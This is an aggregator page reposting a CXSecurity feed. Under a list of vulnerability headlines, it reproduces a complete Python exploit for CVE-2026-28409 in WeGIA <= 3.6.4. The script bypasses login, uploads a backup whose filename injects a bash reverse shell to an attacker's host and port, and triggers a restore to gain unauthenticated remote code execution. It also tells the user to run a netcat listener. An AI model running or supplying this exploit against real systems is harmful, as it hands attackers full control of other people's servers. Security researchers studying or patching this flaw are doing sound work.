惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

aimingoo的专栏
aimingoo的专栏
WordPress大学
WordPress大学
阮一峰的网络日志
阮一峰的网络日志
博客园 - 司徒正美
月光博客
月光博客
宝玉的分享
宝玉的分享
Recent Announcements
Recent Announcements
小众软件
小众软件
H
Hackread – Cybersecurity News, Data Breaches, AI and More
美团技术团队
博客园 - 三生石上(FineUI控件)
A
About on SuperTechFans
J
Java Code Geeks
云风的 BLOG
云风的 BLOG
罗磊的独立博客
大猫的无限游戏
大猫的无限游戏
IT之家
IT之家
Vercel News
Vercel News
量子位
Martin Fowler
Martin Fowler
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
V
Visual Studio Blog
腾讯CDC
有赞技术团队
有赞技术团队

CXSECURITY Database RSS Feed - CXSecurity.com

Langflow 1.3.0 Remote Code Execution Krayin CRM v2.2.x Authenticated Remote Code Execution PraisonAI CodeAgent <= 1.6.77 Remote Code Execution (RCE) via Unsandboxed LLM Code Execution XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 KNX visualisering - Broken Access Control 7-Zip <= 26.02 - Mark-of-the-Web (MotW) Bypass via RAR5 Alternate Data Stream Name Collision NodeBB <= 4.13.2 ActivityPub attributedTo Local UID Spoof - CXSecurity.com KNX visualisering - Broken Access Control vm2 <= 3.11.3 - NodeVM Builtin Denylist Bypass SiYuan <= 3.5.9 Remote Code Execution via Malicious Bazaar Package Windows Defender (MsMpEng.exe) Race Condition -> LPE / SYSTEM / Use-After-Free -> Crash D-Link DSL2600U rom-0 Admin Password Disclosure KNX visualisering - Broken Access Control PHP Link Directory (phpLD) 2.1.3 - SQL Injection, IDOR, CSRF OpenEMR 7.0.2 Arbitrary File Read ZTE ZXHN H188A V6 Authentication Bypass phpLD 2.1.3 (EOL) has authenticated SQLi in admin/dir_validate.php (CATEGORY_ID) and admin ORDER BY (sort), unauthenticated IDOR in add_reciprocal.php, CSRF on admin link actions via GET, and exposed install/ after deployment. Verified locally on v2.1.3. Tenable Terrascan Server <= v1.18.3 SSRF and Local File Read Lenovo LegionSpace 1.7.11.2 DAService Unquoted Service Path ZTE H298A / H108N Unauthenticated Credential Exposure WordPress Contest Gallery 28.1.4 Unauthenticated Blind SQL Injection BrandIT Consultancy - Blind Sql Injection Association Management Script - Multiple Vulnerabilities (IDOR, SQLi, Stored XSS) Canvas Breach: Symbiotic Dual-Virus Model & Origin Parity Evidence Open ISES Tickets < 3.44.2 - Hardcoded MySQL Credentials ePati Antikor NGFW 2.0.1301 Authentication Bypass Windows Shell LNK Spoofing to NTLMv2 Hash Capture Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service Grav CMS 2.0.0-beta.2 Remote Code Execution
WeGIA <= 3.6.4 Remote Code Execution via OS Command Injec...
2026-03-03 · via CXSECURITY Database RSS Feed - CXSecurity.com

#!/usr/bin/env python3 # Exploit Title: WeGIA <= 3.6.4 Remote Code Execution via OS Command Injection in Backup Restore # CVE: CVE-2026-28409 # Date: 2026-02-28 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: # Vendor Homepage: https://github.com/LabRedesCefetRJ/WeGIA # Software Link: https://github.com/LabRedesCefetRJ/WeGIA # Affected: WeGIA <= 3.6.4 # Tested on: # Category: Webapps # Platform: PHP # Exploit Type: Remote # CVSS: 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) # CWE: CWE-78 # Description: OS Command Injection in backup/restore functionality allowing unauthenticated RCE when combined with authentication bypass # Fixed in: 3.6.5 # Usage: python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port> # # Examples: # python3 exploit.py http://192.168.1.100/WeGIA --lhost 192.168.1.50 --lport 4444 # # Options: # --lhost Attacker IP for reverse shell # --lport Attacker listening port # # Notes: # - Requires netcat listener: nc -lvnp <port> # - Uses authentication bypass + command injection in filename during restore # - Payload is reverse shell via bash # # How to Use # # Step 1: Start listener # nc -lvnp 4444 # # Step 2: Run exploit # python3 exploit.py http://target/WeGIA --lhost 10.10.14.5 --lport 4444 import requests import urllib3 import urllib.parse import argparse import sys import time urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) BANNER = r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ▄▄▄▄· ▄▄▄ . ▄▄ • ▄▄▄▄▄ ▄▄▄ ▄▄▄· ▄▄▄· ▄▄▄▄▄▄▄▄▄ .▄▄▄ ▄• ▄▌ ║ ║ ▐█ ▀█▪▀▄.▀·▐█ ▀ ▪•██ ▪ ▀▄ █·▐█ ▀█ ▐█ ▄█•██ ▀▀▄.▀·▀▄ █·█▪██▌ ║ ║ ▐█▀▀█▄▐▀▀▪▄▄█ ▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▄█▀▀█ ██▀· ▐█.▪▐▀▀▪▄▐▀▀▄ █▌▐█· ║ ║ ██▄▪▐█▐█▄▄▌▐█▄▪▐█ ▐█▌·▐█▌.▐▌▐█•█▌▐█ ▪▐▌▐█▪·• ▐█▌·▐█▄▄▌▐█•█▌▐█▄█▌ ║ ║ ·▀▀▀▀ ▀▀▀ ·▀▀▀▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▀ ▀ .▀ ▀▀▀ ▀▀▀ .▀ ▀ ▀▀▀ ║ ║ ║ ║ b a n y a m e r _ s e c u r i t y ║ ║ ║ ║ >>> Silent Hunter • Shadow Presence <<< ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ CVE-2026-28409 • WeGIA Backup Restore Command Injection ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """ print(BANNER) def parse_args(): parser = argparse.ArgumentParser(description="WeGIA CVE-2026-28409 RCE Exploit") parser.add_argument("target", help="Target URL (e.g. http://192.168.1.100/WeGIA)") parser.add_argument("--lhost", required=True, help="Attacker IP for reverse shell") parser.add_argument("--lport", required=True, help="Attacker listening port") return parser.parse_args() def build_payload(lhost, lport): revshell = f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'" filename = f"dump;{revshell};poc.tar.gz" return filename def main(): args = parse_args() base_url = args.target.rstrip('/') lhost = args.lhost lport = args.lport session = requests.Session() session.verify = False malicious_filename = build_payload(lhost, lport) print(f"[*] Generated malicious filename: {malicious_filename}") dummy_content = ( b"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x03" b"\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00" ) print("[*] Attempting authentication bypass + admin session") login_url = f"{base_url}/html/login.php" bypass_data = { 'c': 'true', 'cpf': 'admin', 'id_pessoa': '1' } try: r = session.post(login_url, data=bypass_data, timeout=10) if r.status_code != 200: print(f"[-] Login bypass failed (status {r.status_code})") sys.exit(1) print("[+] Auth bypass appears successful") except Exception as e: print(f"[-] Connection error during login: {e}") sys.exit(1) print("[*] Uploading dummy backup with malicious filename") upload_url = f"{base_url}/html/configuracao/importar_dump.php" files = { 'import': (malicious_filename, dummy_content, 'application/gzip') } upload_data = { 'usuario': '1', 'id_pessoa': '1' } try: r = session.post(upload_url, files=files, data=upload_data, timeout=12) if r.status_code not in (200, 201, 302): print(f"[-] Upload failed (status {r.status_code})") sys.exit(1) print("[+] Upload completed") except Exception as e: print(f"[-] Upload error: {e}") sys.exit(1) print("[*] Triggering restore → attempting RCE") restore_url = f"{base_url}/html/configuracao/gerenciar_backup.php" params = { 'action': 'restore', 'file': malicious_filename, 'usuario': '1', 'id_pessoa': '1' } try: r = session.get(restore_url, params=params, allow_redirects=False, timeout=15) print("[*] Restore request sent") print("[*] Check your listener for incoming reverse shell") print(f"[*] If no connection after 10-20s → target may be patched / firewall blocked / wrong path") except Exception as e: print(f"[-] Error during restore trigger: {e}") print("\nExploit finished. Waiting for shell...\n") if __name__ == "__main__": main()